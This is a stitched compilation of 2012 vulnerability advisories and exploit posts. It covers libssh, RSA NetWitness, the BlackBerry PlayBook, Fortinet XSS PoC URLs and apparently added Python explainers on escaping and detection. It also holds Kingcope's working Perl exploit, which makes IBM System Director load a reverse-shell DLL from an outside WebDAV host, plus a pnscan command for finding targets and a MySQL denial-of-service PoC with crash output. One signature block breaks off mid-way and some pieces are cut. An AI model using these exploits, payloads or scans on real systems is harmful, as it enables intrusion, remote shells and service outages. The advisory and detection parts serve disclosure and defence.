[SECURITY] [DSA 2577-1] libssh security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2577-1                   secur...@debian.org
http://www.debian.org/security/                          Yves-Alexis Perez
December 01, 2012                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : libssh
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-4559 CVE-2012-4561 CVE-2012-4562
Debian Bug     :

Multiple vulnerabilities were discovered in libssh by Florian Weimer and Xi Wang:

CVE-2012-4559: multiple double free() flaws
CVE-2012-4561: multiple invalid free() flaws
CVE-2012-4562: multiple improper overflow checks

Those could lead to a denial of service by making an ssh client linked to libssh crash, and maybe even arbitrary code execution.

For the stable distribution (squeeze), these problems have been fixed in version 0.4.5-3+squeeze1.

For the testing distribution (wheezy), these problems have been fixed in version 0.5.3-1.

For the unstable distribution (sid), these problems have been fixed in version 0.5.3-1.

We recommend that you upgrade your libssh packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iQEcBAEBCgAGBQJQuhCHAAoJEG3bU/KmdcClhN8H/2WeI/NZK6IvKI3JKRniLQxn
Z4RnjjW1au4yZ4b32+qVpLYQ0m8v5kuT5jR2geN95ZXCqk4iY4Jzg38iC1b2CPT5
8hs8y8uvzHwTgia/Rvi4fb9JnDun7bOn3ZInTGkSPpMx+bK38hRKLJ3BOzHsIfwD
WbLlm+Emhd+MJLj3GWoTudd/2wift1ATN7vQG+Dy+budAu9sVv2g3d3fvHGo9ggG
L6XCPRFzONwMgQT6jAwi2GcZYzJ8xK7KP4ELzjnf5yMKxuz2l026mhFK1JwErfWy
N/Rit3gcQ4hek+VSM9JCC5l9lzkvzE6Ldkc1CZu+kkU1Itt2Lez6zfwIJVdYRdc=
=pMqn
-----END PGP SIGNATURE-----
ESA-2012-052 RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2012-052: RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities

EMC Identifier: ESA-2012-052
CVE Identifier: CVE-2012-4608
CVE Identifier: CVE-2012-4609

Severity Rating: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Affected Products:
RSA NetWitness Informer versions prior to 2.0.5.6

Vulnerability Summary:
RSA NetWitness Informer web interface is susceptible to vulnerabilities that could be potentially exploited by malicious users to compromise the affected systems.

Vulnerability Details:
RSA NetWitness Informer web interface is susceptible to cross-site request forgery (CVE-2012-4608) and click-jacking (CVE-2012-4609) vulnerabilities. These vulnerabilities could be potentially exploited by malicious people by tricking an authenticated user into clicking on specially-crafted links. This may lead to execution of malicious HTML requests or scripts in the context of the authenticated user.

Problem Resolution:
It is recommended that the Informer patch (v2.0.5.6) is downloaded from SCOL and installed as soon as possible.

Severity Rating:
For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with a particular security vulnerability.

Obtaining Documentation:
To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.

Obtaining More Information:
For more information about RSA SecurID, visit the RSA web site at http://www.rsa.com/node.aspx?id=1156.

Getting Support and Service:
For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.

General Customer Support Information: http://www.rsa.com/node.aspx?id=1264
RSA SecurCare Online: https://knowledge.rsasecurity.com

EOPS Policy:
RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details.
http://www.rsa.com/node.aspx?id=2575

SecurCare Online Security Advisories
RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

About RSA SecurCare Notes & Security Advisories Subscription
RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you'd like to stop receiving RSA SecurCare Notes & Security Advisories, or if you'd like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.

EMC Product Security Response Center
security_al...@emc.com
http://www.emc.com/contact-us/contact/product-security-response-center.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (Cygwin)

iEUEARECAAYFAlC5Co0ACgkQtjd2rKp+ALwlggCfQMIjkYs0vN/uMkPUvn9umdxp
+asAl3heb7xu2Tx6AdSeM9jdIL+6AGw=
=9RtB
-----END PGP SIGNATURE-----
Low severity flaw in RIM BlackBerry PlayBook OS browser
Summary

The web browser which comes as part of the RIM BlackBerry PlayBook OS can be tricked into disclosing the contents of local files through the planting of a malicious HTML file through the standard download mechanism. It should be noted that in order to exploit this issue, user interaction is required as the user will need to confirm the download of the malicious HTML file. After discussions with the vendor, CVE-2012-5828 was assigned to this vulnerability.

Current

As of 1st November 2012, the state of the vulnerability is believed to be as follows. RIM have begun shipping a patch which it is believed successfully resolves the reported issue.

Thanks

Nth Dimension would like to thank all the security folk at RIM, in particular the BlackBerry Incident Response team for the way they worked to resolve the issue.

-- 
Tim Brown
mailto:t...@nth-dimension.org.uk
http://www.nth-dimension.org.uk/

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Nth Dimension Security Advisory (NDSA20121030)
Date: 30th October 2012
Author: Tim Brown <mailto:t...@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: RIM BlackBerry PlayBook OS 1.0.8.6067 <http://www.rim.com/products/blackberry_tablets.shtml>
Vendor: RIM <http://www.rim.com/>
Risk: Low

Summary

The web browser which comes as part of the RIM BlackBerry PlayBook OS can be tricked into disclosing the contents of local files through the planting of a malicious HTML file through the standard download mechanism. It should be noted that in order to exploit this issue, user interaction is required as the user will need to confirm the download of the malicious HTML file. After discussions with the vendor, CVE-2012-5828 was assigned to this vulnerability.

Solutions

Nth Dimension recommends that the vendor supplied patches should be applied.

Technical Details

It was identified that the PlayBook web browser could be forced to download rather than render HTML files and that, whilst the browser does prompt the user to confirm the location of the download, this download process defaults to an attacker chosen location. Furthermore, once downloaded, it is possible to use the Location header to load the file from the attacker's chosen location using the file:// URL handler in such a manner that the downloaded HTML then has trusted access to the PlayBook filing system. It is possible to craft an HTML download which when opened will lead to arbitrary JavaScript being executed in the local context. The file:// URL handler is trusted to execute across domains.

History

On 12th February 2012, Nth Dimension supplied a PoC exploit for this issue to representatives of RIM. BBSIRT responded on the 20th to confirm that they had received the report and were investigating. RIM further notified Nth Dimension to confirm that all reported vulnerabilities were handled based on CVSS and that only critical vulnerabilities were deemed candidates for out-of-band patching. Less critical issues would however be addressed in future product updates.

Nth Dimension responded on 7th March 2012 to confirm that they agreed with this approach and that in their opinion the issue was not critical and did not warrant an expedited response. Nth Dimension asked to be kept in the loop regarding the release of a patch for this issue in due course.

On 19th September 2012, Nth Dimension asked for an update, in particular to establish whether a CVE had been assigned by RIM for this issue.

On 1st November 2012, RIM responded to say that "The changes for the issues are in the latest 2.1 builds for PlayBook. The build is currently available for WiFi only PlayBooks and we're working with our carrier partners for testing and availability for build for the in-market cellular-enabled PlayBooks."

On 6th November 2012, RIM confirmed that CVE-2012-5828 has been assigned. They also confirmed they believe testing of cellular PlayBooks will be completed by the end of the month. Nth Dimension responded, proposing 1st December 2012 as the embargo date.

Current

As of 1st November 2012, the state of the vulnerability is believed to be as follows. RIM have begun shipping a patch which it is believed successfully resolves the reported issue.

Thanks

Nth Dimension would like to thank all the security folk at RIM, in particular the BlackBerry Incident Response team for the way they worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCAAGBQJQuU6xAAoJEPJhpTVyySo7xcoQAM7KB/2KYIq/IElrO15jr/hH
8Pytj9Q+k0VTmousVUWs5EP+uurZ28dGH8QNdsBv/kmp9M6gPQbex38pVVp+UJxh
DcVoGhVJLsrzATQH+1LH/zVVkV4idERSQvGMjbikHWMdObfr6H37iN/UwK1+O27T
tFQkIbM/rRNZk/OUz+B25D+2C53tdjTsCStkbnmYXKBlMYf0h3M28sFR3bcB5mBg
MFNO7Vr/t16NdFRN+MPgfiRZTATH2gCqklMoe8rmQbu+Fumf1+7T5jlnXORUIiUb
tTKvDjw9o0dL513b58JuIsheiyx0IlvGo4RyfXfWRAZaZiTPSnbzPwl83Bj1JpW+
PJ4Z+4yKcwQcRIfvCDH6vc8o4uMTM7g9SMuLxZBoZN3mFUAOLwy9wJde+w8bmpFA
FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability
Title:
======
FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability

Date:
=====
2012-11-29

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=558

VL-ID:
=====
558

Common Vulnerability Scoring System:
====================================
2.5

Introduction:
=============
Targeting large enterprises the FortiDB-2000B appliance provides a scalable database security and compliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and easy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), IT audit, and regulatory compliance.

Designed for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database security and compliance solution. Through its web-based interface, the FortiDB-1000C centrally monitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent database security policies across the organization without imposing high management burdens on your database admin and IT staff.

The FortiDB-400B appliance provides a cost effective database security and compliance solution for small to mid-size enterprises in a quick to implement, easy to manage package. It scans databases for vulnerabilities, monitors, and audits database activities, and generates compliance reports. Its intuitive web-based interface ensures ease of configuration, minimizing the management burden on your database administrators and IT staff.

(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a Cross Site Scripting Vulnerability in FortiGate's FortiDB 2kB 1kC 400B.

Report-Timeline:
================
2012-05-06: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-12: Vendor Response/Feedback
2012-10-24: Vendor Fix/Patch
2012-11-29: Public or Non-Public Disclosure

Status:
========
Published

Affected Products:
==================
Fortigate
Product: FortiDB - Database Security Appliance v2000B; 1000C & 400B

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A non-persistent input validation vulnerability is detected in FortiGate's FortiDB Appliance 2000B 1000C 400B. The vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). The vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. The bug is on the application side; the execution is non-persistent out of the object exception-handling web application appliance context. Exploitation requires low or medium user interaction. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.

Vulnerable Module(s):
[+] Java Number Format Exception Handling

Affected Function(s):
[+] (Output) Listing

Proof of Concept:
=================
The vulnerability can be exploited by a remote attacker with medium or high required user interaction. For demonstration or reproduce ...

Review: Java Number Format Exception-Handling - Listing [Output] Error

<pre class="error">ExceptionCause: java.lang.NumberFormatException: For input string: "[NON PERSISTENT SCRIPT CODE!])'"
  at java.lang.numberformatexception.forinputstring(numberformatexception.java:48)
  at java.lang.long.parselong(long.java:410)
  at org.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)
  at org.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)
  at org.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)
  at org.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.init(OrchestraFacesContextFactory.java:119)
  at ...

PoC:
http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities
Title:
======
FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities

Date:
=====
2012-12-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=702

VL-ID:
=====
702

Common Vulnerability Scoring System:
====================================
2.1

Introduction:
=============
FortiWeb web application firewalls protect, balance, and accelerate your web applications, databases, and any information exchanged between them. Whether you are protecting applications delivered over a large enterprise, service provider, or cloud-based provider network, FortiWeb appliances will reduce deployment time and simplify security management.

Fortinet's FortiWeb™ has passed ICSA Web Application Firewall Certification. The latest model being tested is FortiWeb 1000C. ICSA Labs certifications are evidence of FortiWeb's commitment to uphold the industry's highest security standards. Achieving this certification ensures that FortiWeb™ customers benefit from best practices in the security industry for all their Web application needs.

(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortiweb/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in Fortinet's FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance.

Report-Timeline:
================
2012-10-01: Researcher Notification & Coordination
2012-10-11: Vendor Notification
2012-10-05: Vendor Response/Feedback
2012-11-11: Vendor Fix/Patch
2012-12-01: Public or Non-Public Disclosure

Status:
========
Published

Affected Products:
==================
Fortinet
Product: FortiWeb Application Series v4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A non persistent cross site scripting vulnerability is detected in Fortinet's FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with low or medium required user interaction and without a local privileged application user account. The vulnerability is located in the Regular Expression - Validation (pcre_expression/validate) module with the bound vulnerable redir and mkey parameters. Successful exploitation results in client side account steal, client side phishing, and client-side appliance module context request manipulation.

Vulnerable Module(s):
[+] Regular Expression - Validation Module (pcre_expression/validate)

Vulnerable Parameter(s):
[+] redir
[+] mkey

Proof of Concept:
=================
The client side cross site scripting vulnerability can be exploited by remote attackers without an application user account and with medium required user interaction. For demonstration or reproduce ...

Code Review: Regular Expression - Validation Module (mkey & redir)

<tr><td>
<table class="footer" cellpadding="0" cellspacing="0">
<tr><td>
<input class="button" type="button" value="Return" onclick="if (window.opener) {window.close(); } else {document.location='/waf/pcre_expression/validate'}">
</td></tr>
</table>
</td></tr>
<input type="hidden" name="mkey" size="22" maxlength="22" value="0[CLIENT SIDE SCRIPT CODE EXECUTION!])">
<input type="hidden" name="validated" value="-1">
<input type="hidden" name="redir" value="/success">
</form>
</table>
</td>
...

PoC:
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

Solution:
=========
The vulnerability can be patched by parsing all mkey and redir success parameter requests of the vulnerable Regular Expression - Validation module.

2012-11-11: Vendor Fix/Patch

Risk:
=====
The security risk of the non persistent cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
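Both Fortinet advisories above (the FortiDB NumberFormatException listing and the FortiWeb mkey/redir hidden inputs) come down to the same defect: a request parameter is copied into HTML without being escaped for the context it lands in, so a value that begins with `">` terminates the attribute and the tag and everything after it is parsed as new markup. The Python below is an added illustration, not code from either appliance or from Vulnerability-Lab: the render functions are hypothetical stand-ins for the appliances' page generation, `int()` stands in for Java's `Long.parseLong`, and the payload is constructed after the shape of the advisories' PoC URLs. It shows the vulnerable output beside the escaped form and a crude check that tells the two apart.

```python
import html
import re

# Constructed payload, shaped like the PoC parameter values in the two advisories above:
# it closes the enclosing attribute and tag, then injects an <iframe> with an onload handler.
PAYLOAD = '0"><iframe src=http://vuln-lab.com onload=alert("VL") <'


def render_hidden_input_vulnerable(mkey: str) -> str:
    """FortiWeb-style: the mkey parameter is copied verbatim into a hidden input's value attribute.
    (Hypothetical stand-in for the appliance's page generation.)"""
    return f'<input type="hidden" name="mkey" size="22" maxlength="22" value="{mkey}">'


def render_hidden_input_fixed(mkey: str) -> str:
    """Same markup, escaped for attribute context: html.escape(quote=True) turns <, >, &, "
    and ' into entities, so the value can neither end the attribute nor open a new tag."""
    return (f'<input type="hidden" name="mkey" size="22" maxlength="22" '
            f'value="{html.escape(mkey, quote=True)}">')


def render_error_vulnerable(conversation_context: str) -> str:
    """FortiDB-style: a non-numeric conversationContext makes the integer parse fail and the
    exception message, which embeds the raw input, is dumped into a <pre class="error"> block.
    int() stands in for Java's Long.parseLong (hypothetical stand-in for the JSF error page)."""
    try:
        int(conversation_context)
    except ValueError:
        message = f'java.lang.NumberFormatException: For input string: "{conversation_context}"'
        return f'<pre class="error">ExceptionCause: {message}</pre>'
    return "<p>ok</p>"


def render_error_fixed(conversation_context: str) -> str:
    """Same flow, but the reflected input is escaped before it reaches the page, and the
    raw exception text is replaced by a generic message."""
    try:
        int(conversation_context)
    except ValueError:
        return (f'<pre class="error">ExceptionCause: invalid conversationContext '
                f'"{html.escape(conversation_context, quote=True)}"</pre>')
    return "<p>ok</p>"


_TAG_RE = re.compile(r"<([A-Za-z][A-Za-z0-9]*)")


def injected_tags(markup: str, expected: set) -> list:
    """Crude context-break check: any element name in the output that the template did not
    put there means the parameter escaped its context. Good enough for a regression test,
    not a substitute for an HTML parser in production."""
    return [t.lower() for t in _TAG_RE.findall(markup) if t.lower() not in expected]


if __name__ == "__main__":
    for name, out, expected in [
        ("FortiWeb mkey, vulnerable", render_hidden_input_vulnerable(PAYLOAD), {"input"}),
        ("FortiWeb mkey, fixed", render_hidden_input_fixed(PAYLOAD), {"input"}),
        ("FortiDB error page, vulnerable", render_error_vulnerable(PAYLOAD), {"pre"}),
        ("FortiDB error page, fixed", render_error_fixed(PAYLOAD), {"pre"}),
    ]:
        print(f"{name}: injected tags = {injected_tags(out, expected)}")
```

Note the `quote=True` argument: escaping only `<`, `>` and `&` is enough inside element text (the FortiDB `<pre>` case) but not inside a quoted attribute (the FortiWeb `value="..."` case), where a bare `"` is all the attacker needs to get out. Escaping for the attribute context covers both.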
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope

IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force it to load a DLL remotely from a WebDAV share. The following exploit will load the DLL from \\isowarez.de\\director\wootwoot.dll; the wootwoot.dll is a reverse shell that will send a shell back to the attacker (the code has to be inside the DLL initialization routine).

The IBM Director exploit works on versions 5.20.3 and before, but not on 5.2.30 SP2 and above.

Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880

There was a prior CVE for it; the CVE states the attack can load local files only, but using the WebDAV server a remote file can be loaded too.

To scan for this software you can enter the following (by using pnscan):

./pnscan -w"M-POST /CIMListener/ HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n" -r HTTP <ipblock> 6988

Exploit:
---snip---
use IO::Socket;

# 1st argument: target host
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => 6988,
                                 Proto    => 'tcp');

# CIM-XML ExportIndication request; the body itself is benign, the trigger is the
# listener path in the request line below
$payload = qq{<?xml version="1.0" encoding="utf-8" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0">
<MESSAGE ID="1007" PROTOCOLVERSION="1.0">
<SIMPLEEXPREQ>
<EXPMETHODCALL NAME="ExportIndication">
<EXPPARAMVALUE NAME="NewIndication">
<INSTANCE CLASSNAME="CIM_AlertIndication">
<PROPERTY NAME="Description" TYPE="string">
<VALUE>Sample CIM_AlertIndication indication</VALUE>
</PROPERTY>
<PROPERTY NAME="AlertType" TYPE="uint16">
<VALUE>1</VALUE>
</PROPERTY>
<PROPERTY NAME="PerceivedSeverity" TYPE="uint16">
<VALUE>3</VALUE>
</PROPERTY>
<PROPERTY NAME="ProbableCause" TYPE="uint16">
<VALUE>2</VALUE>
</PROPERTY>
<PROPERTY NAME="IndicationTime" TYPE="datetime">
<VALUE>20010515104354.00:000</VALUE>
</PROPERTY>
</INSTANCE>
</EXPPARAMVALUE>
</EXPMETHODCALL>
</SIMPLEEXPREQ>
</MESSAGE>
</CIM>};

# the listener name is a host\share\name path: the server resolves it as a
# WebDAV (UNC) location and loads wootwoot.dll from there
$req = "M-POST /CIMListener/isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
     . "Host: $ARGV[0]\r\n"
     . "Content-Type: application/xml; charset=utf-8\r\n"
     . "Content-Length: " . length($payload) . "\r\n"
     . "Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n"
     . "CIMOperation: MethodCall\r\n"
     . "CIMExport: MethodRequest\r\n"
     . "CIMExportMethod: ExportIndication\r\n\r\n";

print $sock $req . $payload;

# echo whatever the server sends back
while (<$sock>) {
    print;
}
---snip---

Cheerio,
Kingcope
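The request shape in the post above (M-POST to /CIMListener/ with a host\share\name listener path) is easy to pick out of proxy, WAF or IDS logs, and the pnscan fingerprint request (an empty listener name) is worth noticing too. The Python below is an added example, not part of Kingcope's post: the sample request lines are constructed, and the rule that a backslash-separated listener name starting with a dotted host name or IPv4 address is a remote-load attempt is an assumption derived only from the exploit request shown above.

```python
import re

# Constructed sample request lines, as a proxy or IDS might log them. The second and fifth
# mirror the shape of the exploit request above: a host\share\name path after /CIMListener/.
SAMPLE_REQUEST_LINES = [
    "M-POST /CIMListener/ HTTP/1.1",
    "M-POST /CIMListener/isowarez.de\\director\\wootwoot HTTP/1.1",
    "POST /CIMListener/localhandler HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "M-POST /CIMListener/192.168.1.5\\share\\evil HTTP/1.1",
]

_REQUEST_LINE = re.compile(r"^(?P<method>[A-Z-]+) (?P<path>\S+) HTTP/\d\.\d$")
_LISTENER_PREFIX = "/CIMListener/"
# Assumption: a leading path component that looks like a dotted host name or an IPv4 address,
# followed by backslash-separated components, is a UNC/WebDAV location the server may load from.
_HOSTLIKE = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def classify(request_line: str) -> str:
    """Label one HTTP request line:
       'other'       - not a CIM listener request
       'probe'       - empty listener name (the fingerprint request pnscan sends above)
       'remote-load' - listener name is host\\share\\name, i.e. a remote library path
       'local'       - any other listener name
    The method is deliberately not checked: M-POST is what the exploit uses, but a plain
    POST to the same path deserves the same look."""
    m = _REQUEST_LINE.match(request_line.strip())
    if not m or not m.group("path").startswith(_LISTENER_PREFIX):
        return "other"
    name = m.group("path")[len(_LISTENER_PREFIX):]
    if name == "":
        return "probe"
    first, sep, _rest = name.partition("\\")
    if sep and _HOSTLIKE.match(first):
        return "remote-load"
    return "local"


def alerts(lines) -> list:
    """Return (line, label) pairs that warrant attention: remote-load first, then probes."""
    labelled = [(line, classify(line)) for line in lines]
    return ([x for x in labelled if x[1] == "remote-load"]
            + [x for x in labelled if x[1] == "probe"])


if __name__ == "__main__":
    for line, label in alerts(SAMPLE_REQUEST_LINES):
        print(f"{label:12s} {line}")
```

Run against real logs, the `remote-load` label is the one to page on; `probe` hits on port 6988 mostly indicate someone enumerating Director installations, which is still worth correlating with the source address.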
MySQL (Linux) Stack based buffer overrun PoC Zeroday
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_bufferoverrun.pl (Description: Binary data)
MySQL (Linux) Heap Based Overrun PoC Zeroday
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_heapoverrun.pl (Description: Binary data)
MySQL (Linux) Database Privilege Elevation Zeroday Exploit
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_privilege_elevation.pl (Description: Binary data)
MySQL Denial of Service Zeroday PoC
(see attachment)

Kingcope

5.5.19-log on SuSE Linux DoS exploit:

use Net::MySQL;
use Unicode::UTF8 qw[decode_utf8 encode_utf8];
$|=1;

my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',   # Default use UNIX socket
    database => 'test',
    user     => "monty",
    password => "python",
    debug    => 1,
);

# COM_BINLOG_DUMP (0x12) with a malformed payload: this single command is what
# crashes mysqld (see mysql_binlog_send in the backtrace below)
$mysql->_execute_command("\x12", "\x00\x00\x00\x00 foo");
exit;

# Everything below is never reached; left as in the original PoC
for ($k=0;$k<5;$k++) { $a .= "<A$k>"; }
for ($k=0;$k<5;$k++) { $a .= "</A$k>"; }

# SELECT example
$mysql->query("SELECT UpdateXML('<a>$a<b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1");
my $record_set = $mysql->create_record_iterator;
while (my $record = $record_set->each) {
    printf "First column: %s Next column: %s\n", $record->[0], $record->[1];
}
$mysql->close;

Crash Log:

started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2
120108 12:55:28 - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong
and this may fail.

key_buffer_size=16777216
read_buffer_size=262144
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x8e6fa48
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 0xa868b35c thread_stack 0x3
/usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63]
/usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c]
[0xe400]
/usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4]
/usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac]
/usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63]
/usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc]
/lib/libpthread.so.0(+0x5b05)[0xb771cb05]
/lib/libc.so.6(clone+0x5e)[0xb74e7d5e]

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query ((nil)): is an invalid pointer
Connection ID (thread ID): 12
Status: NOT_KILLED

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.
Version: '5.5.19-log'  socket: '/var/run/mysql/mysql.sock'  port: 3306  Source distribution

[New Thread 0xa8f1db70 (LWP 7907)]
120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known
120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xa8f1db70 (LWP 7907)]
mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 "", pos=<value optimized out>, flags=65535)
    at /root/mysql-5.5.19/sql/sql_repl.cc:1043
1043        log_file_name, (llstr(my_b_tell(log), llbuff2), llbuff2));
(gdb) x/10i $eip
=> 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370>: mov    0x8(%ecx),%edx
   0x81bf54d <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373>: mov    0x4(%ecx),%eax
   0x81bf550 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376>: mov    %edx,0x4(%esp)
   0x81bf554 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380>: mov    %eax,(%esp)
